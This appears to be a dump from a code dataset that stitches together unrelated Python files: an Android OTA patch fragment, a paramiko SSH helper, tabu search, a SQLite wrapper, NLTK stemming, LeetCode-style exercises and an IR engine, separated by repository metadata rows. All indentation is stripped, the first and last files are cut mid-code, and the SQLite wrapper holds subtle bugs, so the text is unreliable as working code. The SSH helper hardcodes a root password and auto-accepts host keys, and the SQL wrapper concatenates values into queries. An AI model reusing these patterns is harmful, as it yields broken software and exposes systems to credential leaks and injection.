"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
ext = os.path.splitext(tf.name)[1]
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, err = p.communicate()
if err or p.returncode != 0:
print "WARNING: failure running %s:\n%s\n" % (diff_program, err)
return None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print len(diffs), "diffs to compute"
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print "patching failed! %s" % (name,)
else:
print "%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name)
lock.release()
except Exception, e:
print e
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = { "yaffs2": "MTD", "mtd": "MTD",
"ext4": "EMMC", "emmc": "EMMC" }
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return PARTITION_TYPES[fstab[mount_point].fs_type], fstab[mount_point].device
else:
return None
def GetFex(name,path):
if os.path.exists(path):
fex=open(path)
data=fex.read()
fex.close()
return File(name,data)
else:
print " %s is not exist " %(path)
return File(name,"")
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
| [
"[email protected]"
] | |
ff632b330a5981db22ea60d8b5c3733208cdecb9 | 8034442a9778043b1d886220a3c928327b6297d4 | /common/ssh_fabric.py | ea533c2060adeb4fb30f0ffdc8d4832bf1b25f06 | [] | no_license | wangqian0818/auto_test | 5efe6d7b41ff01e6a9f10211674f55e195484a1c | 803a485d9720f090f7fa5d4482092cc4e7d9aa73 | refs/heads/master | 2023-08-24T01:27:40.956398 | 2021-11-02T02:12:14 | 2021-11-02T02:12:14 | 367,355,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,534 | py | #!/usr/bin/env python
# coding: utf-8
# @TIME : 2021/9/1 12:41
import paramiko
import sys
#
# reload(sys)
# sys.setdefaultencoding('utf8')
class Remote_Ops():
def __init__(self, hostname, ssh_port, username='', password=''):
self.hostname = hostname
self.ssh_port = ssh_port
self.username = username
self.password = password
# 密码登入的操作方法
def ssh_connect_exec(self, cmd):
try:
ssh_key = paramiko.SSHClient()
ssh_key.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key.connect(hostname=self.hostname, port=self.ssh_port, username=self.username, password=self.password,
timeout=10)
# paramiko.util.log_to_file('syslogin.log')
except Exception as e:
print('Connect Error:ssh %s@%s: %s' % (self.username, self.hostname, e))
exit()
stdin, stdout, stderr = ssh_key.exec_command(cmd, get_pty=True)
# 切换root
stdin.write(self.password + '\n')
stdin.flush()
err_list = stderr.readlines()
if len(err_list) > 0:
print('ERROR:' + err_list[0])
exit()
# print stdout.read()
for item in stdout.readlines()[2:]:
print(item.strip())
ssh_key.close()
# ssh登陆的操作方法
def ssh_connect_keyfile_exec(self, file_name, cmd):
try:
ssh_key = paramiko.SSHClient()
ssh_key.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_key.connect(hostname=self.hostname, port=self.ssh_port, key_filename=file_name, timeout=10)
# paramiko.util.log_to_file('syslogin.log')
except Exception as e:
print(e)
exit()
stdin, stdout, stderr = ssh_key.exec_command(cmd)
err_list = stderr.readlines()
if len(err_list) > 0:
print('ERROR:' + err_list[0])
exit()
for item in stdout.readlines():
print(item.strip())
ssh_key.close()
if __name__ == '__main__':
# 密码登陆的操作方法:
test = Remote_Ops('10.10.88.13', 22, 'root', '1q2w3e')
test.ssh_connect_exec('/usr/local/bin/jsac-read-db-num.sh /etc/jsac/agentjsac.new.db ipv4acl')
# ssh key登陆的操作方法:(需要到root下运行)
# file_name = '/var/root/.ssh/id_rsa'
# test1 = Remote_Ops('10.211.55.11', 22)
# test1.ssh_connect_keyfile_exec(file_name, 'apt-get update') | [
"[email protected]"
] | |
1760d67abcc3ecccc8485bfdfcd5101b5ad55194 | f3931179f52c7ef67fd56213fdb774f4f125731f | /Graph-InfoClust-GIC经典思路版本/kubao/tabu.py | 608e22d329ac6b369690e47e34681ff164876473 | [] | no_license | zhangbo2008/graph_research_latest | bb5e1c0d34cbed6675e5bcbfa7cc2502259cc15c | c6c363532226554429b14d09ecaaf8eeffd9c31e | refs/heads/main | 2023-03-29T15:52:20.869773 | 2021-04-06T03:06:47 | 2021-04-06T03:06:47 | 355,040,351 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,286 | py | import heapq # Libarary for array sorting https://docs.python.org/2/library/heapq.html
import time
import numpy as np
import math
import pandas as pd
from Solution import Solution
from input import Input
def Write2Excel(results):
solution=pd.DataFrame(results, columns=['Box Type','Box Oriantation in Blok','Box quantity in Blok','Box priority','Blok Starting point','lenght','Width','Hight'])
solution.to_excel('loading hurestic results (Tabu).xlsx')
return
def Tabu_search( Initial_Sol,alpha , beta , gamma ,tabu_size, max_iterations=300, max_solutions=10 , MaxRunTime=60):
start=time.time() # start the timer
Solution_list = [ (-1*Initial_Sol.Score_Calc(Data, alpha , beta , gamma)[0], Initial_Sol) ]
current_Sol= Solution(None) #init for while loop
Best_Sol=Solution(None)
tabu_set = []
it=1
# Main Loop
while it<= max_iterations and time.time() <= start+MaxRunTime:
# Select the solution with minimal score
_ , current_Sol = heapq.heappop( Solution_list )
# if the current solution is better than best solution so far change the best solution
if current_Sol.h_score>Best_Sol.h_score:
Best_Sol=current_Sol
Best_Sol.Score_Calc(Data, alpha , beta , gamma)
#print current_Sol.VU, len(Solution_list)
# genearting new solutions
for Sol,rep in current_Sol.generate_children(6):
# Check if the move is in Tabu list or not
if rep not in tabu_set:
tabu_set = [rep] + tabu_set[:tabu_size-1]
heapq.heappush( Solution_list, (-1*Sol.Score_Calc(Data, alpha , beta , gamma)[0],Sol)) # Add the new solution into the solution list
# Maintain a fix lenght for the solution list
Solution_list = Solution_list[:max_solutions]
it+=1
return (Best_Sol, time.time()-start)
alpha , beta , gamma = 1 , 0 , 0
times=[3,5,10,15,30,60]
filenumbers=[1,2,3,4,5,6,7]
instances=[2,10,15,22,33,45,52,63,78,84]
Final_results=np.zeros((6,7))
for t,T in enumerate(times):
for f,FN in enumerate(filenumbers):
VU=[]
for PN in instances:
Data=Input(FN,PN)
#Data.RandomData(40)
MaxRunTime=T
tabulist_size=int(math.ceil(float(Data.ntype)/2))
max_solutions=2*Data.ntype
Initial_sol= Solution(range(Data.ntype)) # gave a starting solution
# Apply the Tabu
(Best_Sol,Runtime )=Tabu_search( Initial_sol ,alpha , beta , gamma,
tabulist_size, max_solutions=max_solutions ,MaxRunTime=MaxRunTime )
print('Volume Utilization = %f ' %Best_Sol.VU)
VU.append(Best_Sol.VU)
Final_results[t,f]=np.mean(VU)
#print'Best Solution= ' ,Best_Sol.value #,100-Best_Sol.h_score)
#print('Volume Utilization = %f ' %Best_Sol.VU)
#print('Wieght distrbution measure= %f' %Best_Sol.WCG)
#print('Distance from back measure= %f where the maximum is %f' %(Best_Sol.DFF,Solution.max_DFF()))
#print('Run Time = %f sec' %Runtime)
#print('Total number of loaded boxes = %f' %Best_Sol.Total_Box_Number(Data))
#Write2Excel(Best_Sol.Loading_Results)
| [
"[email protected]"
] | |
a5cdcc75d5b039b2168a0c913f6cf22289e0757f | b7b122b7b9c35ec2f191021c3396f4790f023ed3 | /03_用列表存储的坐标_数据采集/readCSVcoordi.py | 622779a136e79f433a8d576a0b5abcfa206a0129 | [
"MIT"
] | permissive | l5d1l5/python-urbanPlanning | e7fe413441aea7df94765062fe14d331a6e0006a | f22e5b561a55ac2263aa96e8e9aff155b0aae1fd | refs/heads/master | 2020-06-22T09:54:54.895918 | 2019-06-18T02:22:14 | 2019-06-18T02:22:14 | 197,694,260 | 0 | 2 | MIT | 2019-07-19T03:19:41 | 2019-07-19T03:19:40 | null | UTF-8 | Python | false | false | 702 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 23:30:43 2017
@author: RichieBao-caDesign设计(cadesign.cn)
"""
import csv
import numpy as np
import matplotlib.pyplot as plt
filePath=r"D:/MUBENAcademy/pythonSystem/code/baiduMapPoiLandscape.csv"
f=open(filePath)
csvReader=csv.reader(f)
coordi=[]
for row in csvReader:
if row:
#coordi.append(eval(row[1]))
#coordi.append(eval(row[2]))
#coordi.append(row[0])
coordi.append((eval(row[1]),eval(row[2])))
#print(coordi)
coordiArray=np.array(coordi)
print(coordiArray[:,0])
plt.plot(coordiArray[:,0],coordiArray[:,1],'ro',markersize=5)
plt.xlabel('lng')
plt.ylabel('lat')
plt.show()
f.close() | [
"[email protected]"
] | |
ae0668ec7b7478809134331aac6cbe81d5b756f5 | 2b9ac87d509ffeca59e46a2fc3373214b0c4bb98 | /StockAnalysisSystem/core/Database/SqlRw.py | 5543c04fc8aae7099369a5fa3d3769fc8a7d37a2 | [
"Apache-2.0"
] | permissive | lifg2000/StockAnalysisSystem | d94023dbb22db11d664700229ae28afed98bebc1 | b0bef50f5c1a9565e1a1f953fedbe7821601147c | refs/heads/master | 2023-03-09T08:13:59.675491 | 2021-02-22T13:48:42 | 2021-02-22T13:48:42 | 309,856,804 | 0 | 0 | Apache-2.0 | 2021-02-22T13:48:43 | 2020-11-04T02:06:38 | null | UTF-8 | Python | false | false | 11,691 | py | # !usr/bin/env python
# -*- coding:utf-8 -*-
"""
@version:
author:Sleepy
@time: 2019/01/08
@file: SqlRw.py
@function:
@modify:
"""
import sqlite3
import traceback
import numpy as np
import pandas as pd
SQL_QUERY_TABLE_COLUMN = '''SELECT p.name as ColumnName
FROM sqlite_master m
left outer join pragma_table_info((m.name)) p
on m.name <> p.name
WHERE m.name = '<<table_name>>'
;'''
class SqlAccess:
def __init__(self, db: str = 0, user: str = '', password: str = '', extra: str = ''):
self.__db_name = db
self.__user_name = user
self.__password = password
self.__extra = extra
def init(self, db: str = 0, user: str = '', password: str = '', extra: str = '') -> bool:
self.__db_name = db
self.__user_name = user
self.__password = password
self.__extra = extra
return True
def GetDatabaseName(self):
return self.__db_name
# ----------------------------------- connection and cursor -----------------------------------
def BuildConnection(self) -> sqlite3.Connection:
if len(self.__db_name) == 0:
return None
try:
return sqlite3.connect(self.__db_name)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return None
finally:
pass
def BuildConnectionCursor(self) -> (sqlite3.Connection, sqlite3.Cursor):
connection = self.BuildConnection()
if connection is None:
return None, None
cursor = connection.cursor()
if cursor is None:
connection.close()
return None, None
return connection, cursor
# ----------------------------------- Safe Execute -----------------------------------
# Data Description Language: Table
def SafeExecuteDDL(self, sql_ddl: str, connection: sqlite3.Connection) -> bool:
if connection is None:
return False
try:
connection.execute(sql_ddl)
connection.commit()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return False
finally:
pass
return True
# Data Manipulation Language: SELECT, UPDATE, DELETE, INSERT INTO
def SafeExecuteDML(self, sql_dml: str, cursor: sqlite3.Cursor) -> bool:
if cursor is None:
return False
try:
cursor.execute(sql_dml)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
return False
finally:
pass
return True
# ----------------------------------- Quick Execute -----------------------------------
def QuickExecuteDDL(self, sql_ddl: str) -> bool:
connection = self.BuildConnection()
if connection is not None:
ret = self.SafeExecuteDDL(sql_ddl, connection)
connection.close()
return ret
return False
def QuickExecuteDML(self, sql_dml: str, commit: bool = False) -> bool:
connection, cursor = self.StartExecuteDML(sql_dml)
if cursor is None and connection is None:
return False
if commit:
connection.commit()
cursor.close()
connection.close()
return True
def StartExecuteDML(self, sql_dml: str) -> (sqlite3.Connection, sqlite3.Cursor):
connection, cursor = self.BuildConnectionCursor()
if cursor is None:
return None, None
try:
cursor.execute(sql_dml)
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
cursor.close()
connection.close()
return None, None
finally:
pass
return connection, cursor
# ----------------------------------- Advance DDL -----------------------------------
def TableExists(self, table_name: str) -> bool:
sql = "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='" + table_name + "'"
connection, cursor = self.StartExecuteDML(sql)
if cursor is None:
return False
b = cursor.fetchall()
existence = (b[0][0] == 1)
cursor.close()
connection.close()
return existence
def CreateTable(self, table_name: str, table_desc: [[str, str]]) -> bool:
fields = ''
for pair in table_desc:
if len(pair) < 2:
return False
if fields != '':
fields += ', '
fields += pair[0] + ' ' + pair[1]
sql = 'CREATE TABLE IF NOT EXISTS ' + table_name + ' (' + fields + ');'
return self.QuickExecuteDDL(sql)
def DropTable(self, table_name: str) -> bool:
return self.QuickExecuteDDL('DROP TABLE ' + table_name)
def GetTableColumns(self, table_name: str) -> list:
sql = SQL_QUERY_TABLE_COLUMN.replace(table_name)
connection, cursor = self.QuickExecuteDML(sql, True)
if cursor is not None:
columns = cursor.fetchall()
columns = [c[0] for c in columns]
cursor.close()
else:
columns = []
if connection is not None:
connection.close()
return columns
# ----------------------------------- Advance DML -----------------------------------
def ExecuteSelect(self, table_name: str, columns: [str], condition: str = '') -> (sqlite3.Connection, sqlite3.Cursor):
sql = self.__gen_sql_select(table_name, columns, condition)
return self.StartExecuteDML(sql)
def ExecuteUpdate(self, table_name: str, update_column: map, condition: str = '') -> bool:
sql = self.__gen_sql_update(table_name, update_column, condition)
return self.QuickExecuteDML(sql, True)
# For safety, condition is required.
def ExecuteDelete(self, table_name: str, condition: str) -> bool:
if condition == '':
return False
sql = 'DELETE FROM ' + table_name + ' WHERE ' + condition
return self.QuickExecuteDML(sql, True)
def ExecuteInsertInto(self, table_name: str, insert_column: map) -> bool:
sql = self.__gen_sql_insert_into(table_name, insert_column)
return self.QuickExecuteDML(sql, True)
def ExecuteUpdateOrInsert(self, table_name: str, insert_column: map, key_columns: [str]) -> bool:
sql = 'INSERT OR IGNORE INTO ' + table_name
columns, values = self.__gen_insert_pairs(insert_column)
sql += ' (' + columns + ') VALUES (' + values + ');'
condition = ''
for c in key_columns:
if c not in insert_column.keys():
return False
if condition != '':
condition += ' AND '
condition += c + " = '" + insert_column.get(c, '') + "'"
sql += self.__gen_sql_update(table_name, insert_column, condition)
return self.QuickExecuteDML(sql, True)
# ----------------------------------- Structure Write -----------------------------------
def ListToDB(self, table_name: str, list_: list, rows: int, cols: int, columns: [str] = None) -> bool:
df = pd.DataFrame(np.array(list_).reshape(rows, cols))
if columns is not None:
df.columns = columns
return self.DataFrameToDB(table_name, df)
def DictToDB(self, table_name: str, dict_: dict, columns: [str] = None) -> bool:
df = pd.DataFrame(list(dict_.items()), columns=columns)
return self.DataFrameToDB(table_name, df)
def DataFrameToDB(self, table_name: str, df: pd.DataFrame, if_exists: str = 'replace') -> bool:
connection, cursor = self.BuildConnectionCursor()
if cursor is None:
return False
try:
df.to_sql(table_name, connection, if_exists=if_exists, index=False)
except Exception as e:
print('DataFrameToDB Fail.')
print(e)
print(traceback.format_exc())
return False
finally:
connection.commit()
cursor.close()
connection.close()
return True
# ----------------------------------- Structure Read -----------------------------------
def ListFromDB(self, table_name: str, columns: [str], condition: str = '') -> [()]:
connection, cursor = self.ExecuteSelect(table_name, columns, condition)
if cursor is None:
return None
values = cursor.fetchall()
cursor.close()
connection.close()
return values
def DictFromDB(self, table_name, columns: [str], condition: str = '') -> dict:
connection, cursor = self.ExecuteSelect(table_name, columns, condition)
if cursor is None:
return None
values = cursor.fetchall()
cursor.close()
connection.close()
dict_ = {}
for key, val in values:
dict_[key] = val
return dict_
def DataFrameFromDB(self, table_name: str, columns: [str] = [], condition: str = '') -> pd.DataFrame:
sql = self.__gen_sql_select(table_name, columns, condition)
connection = self.BuildConnection()
if connection is None:
return None
try:
return pd.read_sql_query(sql, connection)
except Exception as e:
print(e)
finally:
connection.close()
return None
# ============================================ File operation ============================================
def ExportTable(self, table_name: str, file_name: str) -> bool:
df = self.DataFrameFromDB(table_name)
if df is None:
return
df.to_csv(file_name)
return True
# ============================================ Generate SQL ============================================
def __gen_sql_select(self, table_name: str, columns: [str], condition: str = '') -> str:
if columns is None or len(columns) == 0:
sql = 'select * from ' + table_name
else:
sql = 'select ' + ', '.join(columns) + ' from ' + table_name
if len(condition) != 0:
sql += ' where ' + condition
return sql
def __gen_sql_update(self, table_name: str, update_column: map, condition: str = '') -> str:
if update_column is None or len(update_column) == 0:
return ''
sql = 'UPDATE ' + table_name + ' SET '
sql += self.__gen_update_pairs(update_column)
if condition != '':
sql += ' WHERE ' + sql
return sql
def __gen_sql_insert_into(self, table_name: str, insert_column: map) -> str:
if insert_column is None or len(insert_column) == 0:
return ''
columns, values = self.__gen_insert_pairs(insert_column)
return 'INSERT INTO ' + table_name + ' (' + columns + ') VALUES (' + values + ')'
def __gen_update_pairs(self, update_column: map) -> str:
sql = ''
for k in update_column.keys():
sql += k + " = '" + update_column.get(k) + "', "
if sql.endswith(', '):
sql = sql[0:-2]
return sql
def __gen_insert_pairs(self, insert_column: map) -> (str, str):
columns = values = ''
for k in insert_column.keys():
columns += k + ', '
values += "'" + insert_column.get(k) + "', "
if columns.endswith(', '):
columns = columns[0:-2]
if values.endswith(', '):
values = values[0:-2]
return columns, values
| [
"[email protected]"
] | |
cb82788b9ff75cd86e49bf69fbcec4111a67aa5a | 2c760f659bc7e0415142421fb6c540cfd98b6152 | /stem_word.py | 9e8999e197038c72ad4a7266f92cf25d928cf8e7 | [] | no_license | edimaudo/Natural-Language-Processing | 32c9279e2ac44eba6b2502e14a3a4759d0d889bd | c659e8b14b0dd0fd9b7d115496053d7204b1ccc5 | refs/heads/master | 2021-01-12T10:41:15.490730 | 2017-02-19T22:34:39 | 2017-02-19T22:34:39 | 72,611,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
ps = PorterStemmer()
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
python_stem = [ps.stem(word) for word in example_words]
new_text = "It is important to by very pythonly while you are pythoning with python. All pythoners have pythoned poorly at least once."
words = word_tokenize(new_text)
new_text_stem = [ps.stem(word) for word in words]
print(new_text_stem)
| [
"[email protected]"
] | |
bc8d71d97141ecbdf9574f4745d8a3f290be2c6f | 1d2258fbd69719dfe3f3be87f2cf91d13ad655a1 | /Algorithms/Arrays & Strings/print_subarray_0_sum.py | d7ad46d13fe33149c8806a3eac42692f71478e2c | [] | no_license | skhan75/CoderAid | 83625edd52fbe8619d8cc280338da86cf93ecd80 | ec898cb59bd136c4a6cdc8a32c399896febc483e | refs/heads/master | 2023-08-31T14:22:59.778094 | 2023-08-30T05:19:09 | 2023-08-30T05:19:09 | 144,413,708 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | """
Given an array of integers, print all subarrays with 0 sum
"""
from collections import defaultdict
def print_subarrays_with_0_sum(arr):
s = defaultdict(list)
s[0].append(-1)
solution = []
sum = 0
for i in range(len(arr)):
sum += arr[i]
if (sum in s):
# find all sub-arrays with same sum
lst = s[sum]
for val in lst:
solution.append((val+1, i))
s[sum].append(i)
return solution
import unittest
class Test(unittest.TestCase):
def test_print_subarrays_with_0_sum(self):
test_data = [[3, 4, -7, 3, 1, 3, 1, -4, -2, -2]]
expected = [ [(0, 2), (1, 3), (2, 5), (5, 7), (0, 9), (3, 9)] ]
for idx, t in enumerate(test_data):
res = print_subarrays_with_0_sum(t)
self.assertEqual(res, expected[idx])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7137748277f1cd63223ab231f1e78babfc251b80 | ea2d80ac6733210b7841121ce0592a7d591cfa76 | /iprPy/workflow/prepare/relax_static.py | 524cc27724e29c9002303f32eae42c299a8a443d | [] | no_license | StriderO/iprPy | ab0b6b271bb32688dfe7a30866ecc9eaa2c7432e | 49d25adf1c9ac0a52f8fbb726efdfec0c952c989 | refs/heads/master | 2022-12-21T22:29:46.670132 | 2020-09-25T16:58:40 | 2020-09-25T16:58:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,947 | py | # Standard Python libraries
import sys
# iprPy imports
from . import prepare
calculation_name = 'relax_static'
def main(database_name, run_directory_name, lammps_command, **kwargs):
"""
Prepares relax_static calculations from reference_crystal and E_vs_r_scan
records.
buildcombos
- reference : atomicreference from reference_crystal
- parent : atomicparent from calculation_E_vs_r_scan
Parameters
----------
database_name : str
The name of the pre-set database to use.
run_directory_name : str
The name of the pre-set run_directory to use.
lammps_command : str
The LAMMPS executable to use.
**kwargs : str or list, optional
Values for any additional or replacement prepare parameters.
"""
# Set default branch value to match current function's name
kwargs['branch'] = kwargs.get('branch', sys._getframe().f_code.co_name)
script = "\n".join(
[
# Build load information based on reference structures
'buildcombos atomicreference load_file reference',
# Build load information from E_vs_r_scan results
'buildcombos atomicparent load_file parent',
# Specify parent buildcombos terms (parent record's style and the load_key to access)
'parent_record calculation_E_vs_r_scan',
'parent_load_key minimum-atomic-system',
# System manipulations
'sizemults 10 10 10',
# Run parameters
'energytolerance 0.0',
'forcetolerance 1e-10 eV/angstrom',
'maxiterations 10000',
'maxevaluations 100000',
'maxatommotion 0.01 angstrom',
'maxcycles 100',
'cycletolerance 1e-10',
])
# Add additional required terms to kwargs
kwargs['lammps_command'] = lammps_command
# Prepare
prepare(database_name, run_directory_name, calculation_name,
script, **kwargs)
def from_dynamic(database_name, run_directory_name, lammps_command, **kwargs):
"""
Prepares relax_static calculations from relax_dynamic records.
buildcombos
- archive : atomicarchive from calculation_relax_dynamic
Parameters
----------
database_name : str
The name of the pre-set database to use.
run_directory_name : str
The name of the pre-set run_directory to use.
lammps_command : str
The LAMMPS executable to use.
**kwargs : str or list, optional
Values for any additional or replacement prepare parameters.
"""
# Set default branch value to match current function's name
kwargs['branch'] = kwargs.get('branch', sys._getframe().f_code.co_name)
script = "\n".join(
[
# Build load information from relax_dynamic results
'buildcombos atomicarchive load_file archive',
# Specify archive parent buildcombos terms (parent record's style and the load_key to access)
'archive_record calculation_relax_dynamic',
'archive_branch main',
'archive_load_key final-system',
# System manipulations
'sizemults 1 1 1',
# Run parameters
'energytolerance 0.0',
'forcetolerance 1e-10 eV/angstrom',
'maxiterations 10000',
'maxevaluations 100000',
'maxatommotion 0.01 angstrom',
'maxcycles 100',
'cycletolerance 1e-10',
])
# Add additional required terms to kwargs
kwargs['lammps_command'] = lammps_command
# Prepare
prepare(database_name, run_directory_name, calculation_name,
script, **kwargs) | [
"[email protected]"
] | |
c9dba315b8af82eb804dd2e52ca45dde170c6ae8 | 929fc8dd47b91c963c8c2f81d88e3d995a9dfc7c | /src/DP/easy/64_Minimum_Path_Sum.py | 7389b32a1fa43870020e855bad013a3e89549215 | [] | no_license | 1325052669/leetcode | fe7571a9201f4ef54089c2e078810dad11205b14 | dca40686c6a280bd394feb8e6e78d40eecf854b9 | refs/heads/master | 2023-04-01T17:53:30.605822 | 2021-04-10T15:17:45 | 2021-04-10T15:17:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from typing import List
class Solution:
def minPathSum(self, grid: List[List[int]]) -> int:
m = len(grid)
n = len(grid[0])
dp = [[0] * n for _ in range(m)]
dp[-1][-1] = grid[-1][-1]
for i in range(n - 2, -1, -1):
dp[-1][i] = dp[-1][i + 1] + grid[-1][i]
for i in range(m - 2, -1, -1):
dp[i][-1] = dp[i + 1][-1] + grid[i][-1]
for i in range(m - 2, -1, -1):
for j in range(n - 2, -1, -1):
dp[i][j] = min(dp[i + 1][j], dp[i][j + 1]) + grid[i][j]
return dp[0][0]
def main():
print(Solution().minPathSum([[1,3,1],[1,5,1],[4,2,1]]))
if __name__=='__main__':
main() | [
"[email protected]"
] | |
76b17a6841aa8fe14ed93b17483f10d58534b25a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_pupae.py | 99416f9ced84f392cfabb21eec716d975befdd8f | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
#calss header
class _PUPAE():
def __init__(self,):
self.name = "PUPAE"
self.definitions = pupa
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pupa']
| [
"[email protected]"
] | |
fbac1c282e8dd5a8c6c3876e5f54ef6e3c44cdf8 | 7d096568677660790479d87c22b47aae838ef96b | /stubs/System/Windows/Media/Animation_parts/FillBehavior.pyi | 15af9862d0aa4e8dff7d4511c4d3fa4002704cfe | [
"MIT"
] | permissive | NISystemsEngineering/rfmx-pythonnet | 30adbdd5660b0d755957f35b68a4c2f60065800c | cd4f90a88a37ed043df880972cb55dfe18883bb7 | refs/heads/master | 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 | MIT | 2023-02-01T21:58:52 | 2019-06-12T16:02:32 | Python | UTF-8 | Python | false | false | 1,045 | pyi | class FillBehavior(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies how a System.Windows.Media.Animation.Timeline behaves when it is outside its active period but its parent is inside its active or hold period.
enum FillBehavior,values: HoldEnd (0),Stop (1)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
HoldEnd=None
Stop=None
value__=None
| [
"[email protected]"
] | |
9b82980d0ba80121a3e74d36257439bd9ad7a282 | e27333261b8e579564016c71d2061cc33972a8b8 | /.history/api/IR_engine_20210726210035.py | e231b53c33eec2a63c2f86870be7824dac22af35 | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,990 | py | import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics.pairwise import euclidean_distances
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\article_titles.csv"
def setup_app():
df = pd.read_csv(file_path)
df.head()
return
class DataProcessor:
def __init__(self, filename, col):
self.data = pd.read_csv(filename, names=col)
self.data.topic = self.data.topic.astype(str)
self.porter = PorterStemmer()
def tokenize_stem_lower(self, text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [self.porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(self):
self.data['clean_text'] = self.data.apply(lambda x: self.tokenize_stem_lower(x.text), axis=1)
return self.data
class CosineSimilarity:
def __init__(self, data, type='tfidf'):
self.data = data
self.change_matrix_type(type)
def get_result(self, return_size):
cos_sim = cosine_similarity(self.matrix, self.matrix)
top_ind = np.flip(np.argsort(cos_sim[0]))[1:return_size+1]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=10):
self.query_id = query_id
term_doc = self.vec.fit_transform([query_text]+list(self.data.clean_text))
ind = ['query'] + list(self.data.document)
